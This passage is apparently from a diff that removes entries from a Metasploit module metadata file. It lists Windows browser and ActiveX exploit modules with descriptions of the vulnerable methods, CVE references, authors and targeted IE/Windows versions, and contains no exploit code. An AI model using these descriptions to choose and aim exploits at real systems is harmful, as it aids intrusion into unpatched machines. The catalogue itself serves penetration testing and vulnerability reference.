(3.1.502.64) an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2007-2238", - "OSVDB-53933", - "URL-http://technet.microsoft.com/en-us/library/dd282918.aspx" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mswhale_checkforupdates.rb", - "is_install_path": true, - "ref_name": "windows/browser/mswhale_checkforupdates", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/msxml_get_definition_code_exec": { - "name": "MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption", - "fullname": "exploit/windows/browser/msxml_get_definition_code_exec", - "aliases": [], - "rank": 400, - "disclosure_date": "2012-06-12", - "type": "exploit", - "author": [ - "inking26", - "binjo", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a memory corruption flaw in Microsoft XML Core Services\n when trying to access an uninitialized Node with the getDefinition API, which\n may corrupt memory allowing remote code execution.", - "references": [ - "CVE-2012-1889", - "BID-53934", - "OSVDB-82873", - "MSB-MS12-043", - "URL-http://technet.microsoft.com/en-us/security/advisory/2719615", - "URL-http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462", - "URL-https://www.rapid7.com/blog/post/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3 / Vista SP2", - "IE 8 on Windows XP SP3", - "IE 8 with Java 6 on Windows XP SP3", - "IE 8 with Java 6 on Windows 7 SP1/Vista SP2", - "IE 9 with Java 6 on Windows 7 SP1" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb", - "is_install_path": true, - "ref_name": "windows/browser/msxml_get_definition_code_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/nctaudiofile2_setformatlikesample": { - "name": "NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow", - "fullname": "exploit/windows/browser/nctaudiofile2_setformatlikesample", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-01-24", - "type": "exploit", - "author": [ - "MC ", - "dookie", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in the NCTAudioFile2.Audio ActiveX\n Control provided by various audio applications. By sending an overly long\n string to the \"SetFormatLikeSample()\" method, an attacker may be able to\n execute arbitrary code.", - "references": [ - "CVE-2007-0018", - "OSVDB-32032", - "BID-22196", - "US-CERT-VU-292713" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2/SP3 Pro English (IE6)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb", - "is_install_path": true, - "ref_name": "windows/browser/nctaudiofile2_setformatlikesample", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/nis2004_antispam": { - "name": "Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/nis2004_antispam", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-03-19", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Norton AntiSpam 2004. When\n sending an overly long string to the LaunchCustomRuleWizard() method\n of symspam.dll (2004.1.0.147) an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2004-0363", - "OSVDB-6249", - "BID-9916" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/nis2004_antispam.rb", - "is_install_path": true, - "ref_name": "windows/browser/nis2004_antispam", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/nis2004_get": { - "name": "Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/nis2004_get", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-05-16", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX\n Control (ISLAert.dll) provided by Symantec Norton Internet Security 2004.\n By sending an overly long string to the \"Get()\" method, an attacker may be\n able to execute arbitrary code.", - "references": [ - "CVE-2007-1689", - "OSVDB-36164", - "URL-http://securityresponse.symantec.com/avcenter/security/Content/2007.05.16.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0/SP1 Pro English", - "Windows 2000 Pro English All" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/nis2004_get.rb", - "is_install_path": true, - "ref_name": "windows/browser/nis2004_get", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/notes_handler_cmdinject": { - "name": "IBM Lotus Notes Client URL Handler Command Injection", - "fullname": "exploit/windows/browser/notes_handler_cmdinject", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-06-18", - "type": "exploit", - "author": [ - "Moritz Jodeit", - "Sean de Regge", - "juan vazquez " - ], - "description": "This module exploits a command injection vulnerability in the URL handler for\n for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with\n a specially crafted notes:// URL to execute arbitrary commands with also arbitrary\n arguments. This module has been tested successfully on Windows XP SP3 with IE8,\n Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.", - "references": [ - "CVE-2012-2174", - "OSVDB-83063", - "BID-54070", - "ZDI-12-154", - "URL-http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html", - "URL-http://www-304.ibm.com/support/docview.wss?uid=swg21598348" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2021-10-06 13:43:31 +0000", - "path": "/modules/exploits/windows/browser/notes_handler_cmdinject.rb", - "is_install_path": true, - "ref_name": "windows/browser/notes_handler_cmdinject", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/browser/novell_groupwise_gwcls1_actvx": { - "name": "Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution", - "fullname": "exploit/windows/browser/novell_groupwise_gwcls1_actvx", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-01-30", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in the Novell GroupWise Client gwcls1.dll\n ActiveX. Several methods in the GWCalServer control use user provided data as\n a pointer, which allows to read arbitrary memory and execute arbitrary code. This\n module has been tested successfully with GroupWise Client 2012 on IE6 - IE9. The\n JRE6 needs to be installed to achieve ASLR bypass.", - "references": [ - "CVE-2012-0439", - "OSVDB-89700", - "BID-57658", - "ZDI-13-008", - "URL-http://www.novell.com/support/kb/doc.php?id=7011688" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3", - "IE 7 on Windows Vista", - "IE 8 on Windows Vista", - "IE 8 on Windows 7", - "IE 9 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb", - "is_install_path": true, - "ref_name": "windows/browser/novell_groupwise_gwcls1_actvx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/novelliprint_callbackurl": { - "name": "Novell iPrint Client ActiveX Control call-back-url Buffer Overflow", - "fullname": "exploit/windows/browser/novelliprint_callbackurl", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-08-20", - "type": "exploit", - "author": [ - "Trancer " - ], - "description": "This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42.\n When sending an overly long string to the 'call-back-url' parameter in an\n op-client-interface-version action of ienipp.ocx an attacker may be able to\n execute arbitrary code.", - "references": [ - "CVE-2010-1527", - "OSVDB-67411", - "URL-http://web.archive.org/web/20100824204359/http://secunia.com:80/secunia_research/2010-104", - "EDB-15042" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/novelliprint_callbackurl.rb", - "is_install_path": true, - "ref_name": "windows/browser/novelliprint_callbackurl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/novelliprint_datetime": { - "name": "Novell iPrint Client ActiveX Control Date/Time Buffer Overflow", - "fullname": "exploit/windows/browser/novelliprint_datetime", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-08", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When\n passing a specially crafted date/time string via certain parameters to ienipp.ocx\n an attacker can execute arbitrary code.\n\n NOTE: The \"operation\" variable must be set to a valid command in order to reach this\n vulnerability.", - "references": [ - "CVE-2009-1569", - "BID-37242", - "OSVDB-60804", - "URL-http://web.archive.org/web/20091213033620/http://secunia.com:80/advisories/35004" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "iPrint 5.30 Windows Client" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/novelliprint_datetime.rb", - "is_install_path": true, - "ref_name": "windows/browser/novelliprint_datetime", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/novelliprint_executerequest": { - "name": "Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow", - "fullname": "exploit/windows/browser/novelliprint_executerequest", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-02-22", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Novell iPrint Client 4.26. When\n sending an overly long string to the ExecuteRequest() property of ienipp.ocx\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2008-0935", - "OSVDB-42063", - "BID-27939" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/novelliprint_executerequest.rb", - "is_install_path": true, - "ref_name": "windows/browser/novelliprint_executerequest", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/novelliprint_executerequest_dbg": { - "name": "Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow", - "fullname": "exploit/windows/browser/novelliprint_executerequest_dbg", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-08-04", - "type": "exploit", - "author": [ - "Trancer " - ], - "description": "This module exploits a stack-based buffer overflow in Novell iPrint Client 5.40.\n When sending an overly long string to the 'debug' parameter in ExecuteRequest()\n property of ienipp.ocx an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2010-3106", - "OSVDB-66960", - "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-10-06", - "EDB-15001" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb", - "is_install_path": true, - "ref_name": "windows/browser/novelliprint_executerequest_dbg", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/novelliprint_getdriversettings": { - "name": "Novell iPrint Client ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/novelliprint_getdriversettings", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-06-16", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Novell iPrint Client 4.34. When\n sending an overly long string to the GetDriverSettings() property of ienipp.ocx\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2008-2908", - "OSVDB-46194", - "URL-http://web.archive.org/web/20081206030916/http://secunia.com:80/advisories/30709/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/novelliprint_getdriversettings.rb", - "is_install_path": true, - "ref_name": "windows/browser/novelliprint_getdriversettings", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/novelliprint_getdriversettings_2": { - "name": "Novell iPrint Client ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/novelliprint_getdriversettings_2", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-11-15", - "type": "exploit", - "author": [ - "mr_me ", - "Dr_IDE" - ], - "description": "This module exploits a stack buffer overflow in Novell iPrint Client 5.52. When\n sending an overly long string to the GetDriverSettings() property of ienipp.ocx\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2010-4321", - "BID-44966", - "OSVDB-69357", - "ZDI-10-256", - "EDB-16014", - "URL-http://www.novell.com/support/viewContent.do?externalId=7007234" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb", - "is_install_path": true, - "ref_name": "windows/browser/novelliprint_getdriversettings_2", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/novelliprint_target_frame": { - "name": "Novell iPrint Client ActiveX Control target-frame Buffer Overflow", - "fullname": "exploit/windows/browser/novelliprint_target_frame", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-08", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When\n passing an overly long string via the \"target-frame\" parameter to ienipp.ocx\n an attacker can execute arbitrary code.\n\n NOTE: The \"operation\" variable must be set to a valid command in order to reach this\n vulnerability.", - "references": [ - "CVE-2009-1568", - "BID-37242", - "OSVDB-60803", - "URL-http://web.archive.org/web/20091213033630/http://secunia.com:80/advisories/37169" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "iPrint 5.30 Windows Client" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/novelliprint_target_frame.rb", - "is_install_path": true, - "ref_name": "windows/browser/novelliprint_target_frame", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ntr_activex_check_bof": { - "name": "NTR ActiveX Control Check() Method Buffer Overflow", - "fullname": "exploit/windows/browser/ntr_activex_check_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-01-11", - "type": "exploit", - "author": [ - "Carsten Eiram", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in NTR ActiveX 1.1.8. The\n vulnerability exists in the Check() method, due to the insecure usage of strcat to\n build a URL using the bstrParams parameter contents (note: this is also the reason\n why the module won't allow you to modify the URIPATH), which leads to code execution\n under the context of the user visiting a malicious web page. In order to bypass\n DEP and ASLR on Windows Vista and Windows 7 JRE 6 is needed.", - "references": [ - "CVE-2012-0266", - "OSVDB-78252", - "BID-51374", - "URL-http://web.archive.org/web/20120514113631/http://secunia.com/secunia_research/2012-1/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3", - "IE 7 on Windows Vista", - "IE 8 on Windows Vista", - "IE 8 on Windows 7", - "IE 9 on Windows 7" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/ntr_activex_check_bof.rb", - "is_install_path": true, - "ref_name": "windows/browser/ntr_activex_check_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ntr_activex_stopmodule": { - "name": "NTR ActiveX Control StopModule() Remote Code Execution", - "fullname": "exploit/windows/browser/ntr_activex_stopmodule", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-01-11", - "type": "exploit", - "author": [ - "Carsten Eiram", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in the NTR ActiveX 1.1.8. The\n vulnerability exists in the StopModule() method, where the lModule parameter is\n used to dereference memory to get a function pointer, which leads to code execution\n under the context of the user visiting a malicious web page.", - "references": [ - "CVE-2012-0267", - "OSVDB-78253", - "BID-51374", - "URL-http://web.archive.org/web/20120122095846/http://secunia.com:80/secunia_research/2012-2" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 7 on Windows Vista" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/ntr_activex_stopmodule.rb", - "is_install_path": true, - "ref_name": "windows/browser/ntr_activex_stopmodule", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/oracle_autovue_setmarkupmode": { - "name": "Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow", - "fullname": "exploit/windows/browser/oracle_autovue_setmarkupmode", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-04-18", - "type": "exploit", - "author": [ - "Brian Gorenc", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in the AutoVue.ocx ActiveX control.\n The vulnerability, due to the insecure usage of an strcpy like function in the\n SetMarkupMode method, when handling a specially crafted sMarkup argument, allows\n to trigger a stack based buffer overflow which leads to code execution under the\n context of the user visiting a malicious web page.\n\n The module has been successfully tested against Oracle AutoVue Desktop Version\n 20.0.0 (AutoVue.ocx 20.0.0.7330) on IE 6, 7, 8 and 9 (Java 6 needed to DEP and\n ASLR bypass).", - "references": [ - "CVE-2012-0549", - "BID-53077", - "OSVDB-81439", - "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-12-05", - "URL-http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html", - "URL-https://www.rapid7.com/blog/post/2012/08/15/the-stack-cookies-bypass-on-cve-2012-0549" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3 / Windows Vista SP2", - "IE 8 with Java 6 on Windows XP SP3/7 SP1/Vista SP2", - "IE 9 with Java 6 on Windows 7 SP1" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb", - "is_install_path": true, - "ref_name": "windows/browser/oracle_autovue_setmarkupmode", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/oracle_dc_submittoexpress": { - "name": "Oracle Document Capture 10g ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/oracle_dc_submittoexpress", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-08-28", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0).\n Oracle Document Capture 10g comes bundled with a third party ActiveX control\n emsmtp.dll (6.0.1.0). When passing an overly long string to the method \"SubmitToExpress\"\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-4607", - "OSVDB-38335", - "BID-25467", - "US-CERT-VU-281977" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb", - "is_install_path": true, - "ref_name": "windows/browser/oracle_dc_submittoexpress", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/oracle_webcenter_checkoutandopen": { - "name": "Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution", - "fullname": "exploit/windows/browser/oracle_webcenter_checkoutandopen", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-04-16", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in the Oracle WebCenter Content\n CheckOutAndOpenControl ActiveX. This vulnerability exists in openWebdav(), where\n user controlled input is used to call ShellExecuteExW(). This module abuses the\n control to execute an arbitrary HTA from a remote location. This module has been\n tested successfully with the CheckOutAndOpenControl ActiveX installed with Oracle\n WebCenter Content 11.1.1.6.0.", - "references": [ - "CVE-2013-1559", - "OSVDB-92386", - "BID-59122", - "URL-http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html", - "ZDI-13-094" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2021-10-06 13:43:31 +0000", - "path": "/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb", - "is_install_path": true, - "ref_name": "windows/browser/oracle_webcenter_checkoutandopen", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/browser/orbit_connecting": { - "name": "Orbit Downloader Connecting Log Creation Buffer Overflow", - "fullname": "exploit/windows/browser/orbit_connecting", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-02-03", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Orbit Downloader 2.8.4. When an\n attacker serves up a malicious web site, arbitrary code may be executed.\n The PAYLOAD windows/shell_bind_tcp works best.", - "references": [ - "CVE-2009-0187", - "OSVDB-52294", - "BID-33894" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / IE 6.0 SP0-SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/orbit_connecting.rb", - "is_install_path": true, - "ref_name": "windows/browser/orbit_connecting", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ovftool_format_string": { - "name": "VMWare OVF Tools Format String Vulnerability", - "fullname": "exploit/windows/browser/ovftool_format_string", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-11-08", - "type": "exploit", - "author": [ - "Jeremy Brown", - "juan vazquez " - ], - "description": "This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for\n Windows. The vulnerability occurs when printing error messages while parsing a\n a malformed OVF file. The module has been tested successfully with VMWare OVF Tools\n 2.1 on Windows XP SP3.", - "references": [ - "CVE-2012-3569", - "OSVDB-87117", - "BID-56468", - "URL-https://www.vmware.com/security/advisories/VMSA-2012-0015.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VMWare OVF Tools 2.1 on Windows XP SP3" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/browser/ovftool_format_string.rb", - "is_install_path": true, - "ref_name": "windows/browser/ovftool_format_string", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/pcvue_func": { - "name": "PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability", - "fullname": "exploit/windows/browser/pcvue_func", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-10-05", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "mr_me ", - "TecR0c " - ], - "description": "This module exploits a function pointer control within SVUIGrd.ocx of PcVue 10.0.\n By setting a dword value for the SaveObject() or LoadObject(), an attacker can\n overwrite a function pointer and execute arbitrary code.", - "references": [ - "CVE-2011-4044", - "OSVDB-77561", - "BID-49795", - "URL-http://aluigi.altervista.org/adv/pcvue_1-adv.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Internet Explorer 6 / Internet Explorer 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/pcvue_func.rb", - "is_install_path": true, - "ref_name": "windows/browser/pcvue_func", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/persits_xupload_traversal": { - "name": "Persits XUpload ActiveX MakeHttpRequest Directory Traversal", - "fullname": "exploit/windows/browser/persits_xupload_traversal", - "aliases": [], - "rank": 600, - "disclosure_date": "2009-09-29", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a directory traversal in Persits Software Inc's\n XUpload ActiveX control(version 3.0.0.3) that's included in HP LoadRunner 9.5.\n By passing a string containing \"..\\\" sequences to the MakeHttpRequest method,\n an attacker is able to write arbitrary files to arbitrary locations on disk.\n\n Code execution occurs by writing to the All Users Startup Programs directory.\n You may want to combine this module with the use of exploit/multi/handler since a\n user would have to log for the payload to execute.", - "references": [ - "CVE-2009-3693", - "OSVDB-60001" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/persits_xupload_traversal.rb", - "is_install_path": true, - "ref_name": "windows/browser/persits_xupload_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/quickr_qp2_bof": { - "name": "IBM Lotus QuickR qp2 ActiveX Buffer Overflow", - "fullname": "exploit/windows/browser/quickr_qp2_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-05-23", - "type": "exploit", - "author": [ - "Gaurav Baruah", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow vulnerability on the UploadControl\n ActiveX. The vulnerability exists in the handling of the \"Attachment_Times\"\n property, due to the insecure usage of the _swscanf. The affected ActiveX is\n provided by the qp2.dll installed with the IBM Lotus Quickr product.\n\n This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7,\n using the qp2.dll 8.1.0.1800. In order to bypass ASLR the no aslr compatible module\n msvcr71.dll is used. This one is installed with the qp2 ActiveX.", - "references": [ - "CVE-2012-2176", - "OSVDB-82166", - "BID-53678", - "ZDI-12-134", - "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21596191" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3", - "IE 7 on Windows Vista", - "IE 8 on Windows Vista", - "IE 8 on Windows 7", - "IE 9 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/quickr_qp2_bof.rb", - "is_install_path": true, - "ref_name": "windows/browser/quickr_qp2_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/real_arcade_installerdlg": { - "name": "Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution", - "fullname": "exploit/windows/browser/real_arcade_installerdlg", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-04-03", - "type": "exploit", - "author": [ - "rgod", - "sinn3r " - ], - "description": "This module exploits a vulnerability in Real Networks Arcade Game's ActiveX control. The \"exec\"\n function found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands\n on the victim machine.", - "references": [ - "OSVDB-71559", - "EDB-17105" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 